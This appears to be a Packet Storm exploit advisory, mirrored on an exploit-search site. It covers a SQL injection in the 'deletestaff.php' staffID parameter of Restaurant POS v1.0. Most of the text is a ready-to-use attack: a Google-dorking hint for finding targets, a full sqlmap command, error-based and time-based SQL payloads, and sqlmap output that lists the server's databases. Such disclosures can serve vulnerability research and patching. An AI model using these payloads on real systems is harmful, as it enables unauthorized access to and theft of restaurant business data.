Share
## https://sploitus.com/exploit?id=PACKETSTORM:181832
=============================================================================================================================================
| # Title : Restaurant POS v1.0 SQL injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html |
=============================================================================================================================================
poc :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] use payload : admin/deletestaff.php?staffID=1
[+] E:\sqlmap>python sqlmap.py -u http://127.0.0.1/bangresto-main/admin/deletestaff.php?staffID=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs
[+] ---
GET parameter 'staffID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1823 HTTP(s) requests:
---
Parameter: staffID (GET)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: staffID=1 AND EXTRACTVALUE(5264,CONCAT(0x5c,0x71787a7171,(SELECT (ELT(5264=5264,1))),0x7162787071))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: staffID=1 AND (SELECT 3481 FROM (SELECT(SLEEP(5)))frXm)
---
[22:32:22] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.0.30, Apache 2.4.58, PHP
back-end DBMS: MySQL >= 5.1 (MariaDB fork)
[22:32:22] [INFO] fetching database names
[22:32:22] [INFO] starting 7 threads
[22:32:22] [INFO] retrieved: 'bangresto'
[22:32:22] [INFO] retrieved: 'cms'
[22:32:22] [INFO] retrieved: 'phpmyadmin'
[22:32:22] [INFO] retrieved: 'mysql'
[22:32:22] [INFO] retrieved: 'test'
[22:32:22] [INFO] retrieved: 'information_schema'
[22:32:22] [INFO] retrieved: 'performance_schema'
available databases [7]:
[*] bangresto
[*] ending @ 22:32:22 /2024-08-16/
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================